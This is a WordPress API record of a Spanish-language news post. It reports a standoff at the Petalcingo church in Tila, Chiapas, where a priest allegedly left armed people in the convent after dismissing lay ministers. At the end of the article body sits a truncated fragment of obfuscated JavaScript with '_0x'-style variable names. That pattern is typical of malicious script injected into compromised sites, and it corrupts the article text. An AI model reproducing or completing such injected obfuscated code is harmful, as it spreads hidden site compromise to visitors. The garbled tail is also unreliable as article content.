{"id":6260,"date":"2022-10-29T04:13:07","date_gmt":"2022-10-29T04:13:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6260"},"modified":"2022-10-29T04:13:08","modified_gmt":"2022-10-29T04:13:08","slug":"denuncian-presencia-de-grupo-armado-en-petalcingo-tila","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6260","title":{"rendered":"Denuncian presencia de grupo armado en Petalcingo Tila"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"925\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Captura-de-Pantalla-2022-10-28-a-las-18.32.52-925x1024.png\" alt=\"\" class=\"wp-image-6261\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Captura-de-Pantalla-2022-10-28-a-las-18.32.52-925x1024.png 925w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Captura-de-Pantalla-2022-10-28-a-las-18.32.52-271x300.png 271w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Captura-de-Pantalla-2022-10-28-a-las-18.32.52-768x851.png 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Captura-de-Pantalla-2022-10-28-a-las-18.32.52.png 1358w\" sizes=\"auto, (max-width: 925px) 100vw, 925px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El centro de Derechos Humanos Digna Ochoa, dio a conocer que ha recibido informaci\u00f3n por problema de la iglesia de Petalcingo, ya que el pasado 27 de octubre, se dio una confrontaci\u00f3n o enfrentamiento, entre ellos gente armada que ingres\u00f3 al interior del convento que dej\u00f3 el padre Jos\u00e9 \u201cN\u201d, y la comunidad cristiana de la iglesia, y hasta la ma\u00f1ana de este viernes 28, continuaba rodeada la iglesia. Cuentan que el 24 de octubre tuvieron audiencia con el obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez, donde acudieron 30 personas como representantes, pero solo 6 dejaron entrar, ya que el obispo les cerr\u00f3 la puerta, \u201cque porque hab\u00eda estado unos d\u00edas antes en Yajal\u00f3n y los mismo que entraron platico con el obispo y estaba el padre Jos\u00e9, pero que no dijeron nada, los ministros contestaron que no los dejaron decir m\u00e1s cosas, los ten\u00eda controlado el padre Jos\u00e9\u201d. En esa reuni\u00f3n el obispo sugiri\u00f3 que fueran a platicar con el padre Jos\u00e9 y se le diera a conocer la inconformidad, pero la gente lo hizo el d\u00eda 25 de octubre a las 5 de la tarde, donde se molest\u00f3 y no escuch\u00f3, ah\u00ed es de donde anunci\u00f3 que \u00e9l tambi\u00e9n tiene grupo. &#8220;El obispo sugiri\u00f3 que le fueran a platicar con el padre Jos\u00e9 y se le d\u00e9 a conocer la inconformidad, la gente lo hizo el d\u00eda 25 de octubre a las 5 de la tarde pero se molest\u00f3 y no escuch\u00f3 el padre Jos\u00e9, ah\u00ed donde anunci\u00f3 que \u00e9l tambi\u00e9n tiene grupo&#8221;, narran. &#8220;El martes 26 convocaron a reuni\u00f3n, los encargados, ministros y catequistas, pero padre Jos\u00e9 mand\u00f3 su gente que solo son como 10 personas m\u00e1s cercanos a \u00e9l, que los pag\u00f3 con dinero, para confrontarse en la reuni\u00f3n&#8221;, se\u00f1alan. Indican que en la celebraci\u00f3n de la hora santa, el padre destituy\u00f3 a los ministros Jos\u00e9 M\u00e9ndez, Genaro Cruz, Ramiro P\u00e9rez e Irene P\u00e9rez, quienes formaron parte de la comisi\u00f3n. &#8220;Es donde se encabrono la gente, convocaron a toda la gente, para que como pueden presionar ya para sacar el padre, c\u00f3mo la 6 de la tarde el d\u00eda de ayer el padre abandona la iglesia, pero dejo gente armada en el interior del convento, ahora la gente lo tiene rodeada la iglesia, pero hay temor a que la gente armada que dej\u00f3 el padre puedan provocar o la misma gente&#8221;, se suscribe. Por lo anterior, se encuentra gente armada a espera, de que el p\u00e1rroco, se retire por las buenas, o a espera de que el obispo le pida se vaya.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El centro de Derechos Humanos Digna Ochoa, dio a conocer que ha recibido informaci\u00f3n por problema de la iglesia de Petalcingo, ya que el pasado 27 de octubre, se dio una confrontaci\u00f3n o enfrentamiento, entre ellos gente armada que ingres\u00f3 al interior del convento que dej\u00f3 el padre Jos\u00e9 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6261,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6260","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6260"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6260\/revisions"}],"predecessor-version":[{"id":6262,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6260\/revisions\/6262"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6261"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}